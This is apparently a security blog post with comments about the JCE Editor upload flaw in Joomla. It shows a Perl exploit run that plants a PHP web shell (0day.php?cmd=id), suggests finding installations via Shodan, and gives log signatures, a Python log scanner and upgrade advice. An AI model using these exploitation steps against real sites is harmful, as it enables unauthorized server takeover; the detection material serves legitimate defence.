If we take a look at the zone-h.org website, we can see that people like Hmei7 are hacking Joomla websites through a JCE Editor vulnerability every day, every minute...
It's possible that one day, when you go to your Joomla Website, you will see something like this:
How can we take advantage of the JCE Editor Weakness?
If you are using Joomla with JCE 2.0.10 (prior versions may also be affected), your website is at risk.
AmnPardaz Security Research & Penetration Testing Group published two scripts in PHP and Perl after the release of a vendor-supplied patch for JCE's vulnerability.
You can get those exploit scripts here.
Now, we are going to hack our own website... ;)
First of all, we need to locate a Joomla installation on Shodan: http://www.shodanhq.com/search?q=joomla
Then, we run the Perl exploit on our Linux machine:
behindthefirewalls.blogspot.com@Hacking:~$ perl jce.pl xxx.com
.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.
|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||
[*] Checking Exploitability ...
[*] Trying to upload 0day.gif ...
[*] Trying to change extension from .gif to .php ...
[+] 0day.php was successfully uploaded
[+] Path:xxx.com/images/stories/0day.php?cmd=id
Finally, if you get the Path, you can check if the server has been hacked. If you visit...
http://xxx.com/images/stories/0day.php?cmd=id
You will see...
In this case, we have modified the script so that it prints our name on the web server.
If you are a security engineer, you should check the web server logs for something like:
POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1
Head //images/stories/0day.php HTTP/1.1
If you have a Snort IDS, you will see the following Snort events...
In the last few days, many clients have called me asking about these attacks. The response is: restore a backup of your site and upgrade to the JCE 2.0.11 release.
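The log check described above, as an added example that is not part of the original post: a Python script that scans Common/Combined Log Format lines for the JCE imgmanager POST and for PHP files requested under images/stories. The function names, sample lines, dates and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Common/Combined Log Format: ip - - [ts] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Za-z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# The upload directory should only hold media, so any PHP-like file there is suspect.
PHP_IN_UPLOADS = re.compile(r'/images/stories/.*\.(php\d?|phtml)$', re.I)

def classify(line):
    """Return (ip, finding, path, status) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Split by hand: urlsplit() would read the leading '//' as a hostname.
    raw_path, _, query = m['target'].partition('?')
    path = re.sub(r'/+', '/', raw_path)
    args = {k.lower(): v[-1].lower() for k, v in parse_qs(query).items()}
    status = int(m['status'])
    if (m['method'].upper() == 'POST' and path.lower().endswith('/index.php')
            and args.get('option') == 'com_jce'
            and args.get('plugin') == 'imgmanager'):
        return (m['ip'], 'jce-imgmanager-post', path, status)
    if PHP_IN_UPLOADS.search(path):
        return (m['ip'], 'php-in-images-stories', path, status)
    return None

def scan(lines):
    """Return all findings plus the PHP paths that the server actually served."""
    findings = [f for f in map(classify, lines) if f]
    # A 2xx answer for a PHP file in the upload directory means the file exists.
    dropped = sorted({f[2] for f in findings
                      if f[1] == 'php-in-images-stories' and 200 <= f[3] < 300})
    return findings, dropped

# Constructed sample lines (documentation IP ranges), modelled on the two requests above.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2013:10:01:02 +0100] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2013:10:01:04 +0100] "Head //images/stories/0day.php HTTP/1.1" 200 -',
    '198.51.100.9 - - [01/Jan/2013:10:05:00 +0100] "GET /images/stories/logo.gif HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2013:10:06:00 +0100] "GET /images/stories/x.php HTTP/1.1" 404 210',
]

if __name__ == '__main__':
    findings, dropped = scan(SAMPLE_LOG)
    for f in findings:
        print(f)
    print('PHP files served from the upload directory:', dropped)
```

Any path reported as served should be treated as a sign the site needs the backup restore and JCE upgrade described above.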
Also, you can exploit this vulnerability with Metasploit.
You can learn how to fix this vulnerability here.
If you want to know who Hmei7 is, visit this website.
Great explanation by Josh Pate here.
Yes, some time ago I was also affected by this same problem. This blog will help so that from now on no one is affected by the same problem...
Hi Karthik! Thanks for the comment. This blog wants to try this, helping others to avoid attacks against our IT infrastructure. I will be working on this!!
Hey, thanks for showing how it's done, I recently had several websites attacked and now thanks to this I fixed it.
Thanks for this. Just a short note, before the Shodan link you are referring to Drupal installations.
The information on this blog is really interesting. Every Joomla developer should know this kind of useful information for Joomla website development.
That is very great information, I love to see this! Check this bestkreative, thanks for sharing..
I always like to read these types of informative posts, which provide me the best info about the latest things happening in Joomla development. I think today is a lucky day for me to find this kind of stuff here. Thanks for this!!
Hi, I would like to read this type of writing. Very much pleased to read this. joomla, Joomla
Thanks for sharing the security information. Everyone should know this information to protect their site from unauthorized access. It's helpful info for me.
Thank you.
Drupal with some modules installed is also vulnerable to this exploit, not only Joomla.
I have seen a lot of attempts in web server logs. I suspect that some automated zombie bots are scanning the internet searching for unpatched networks.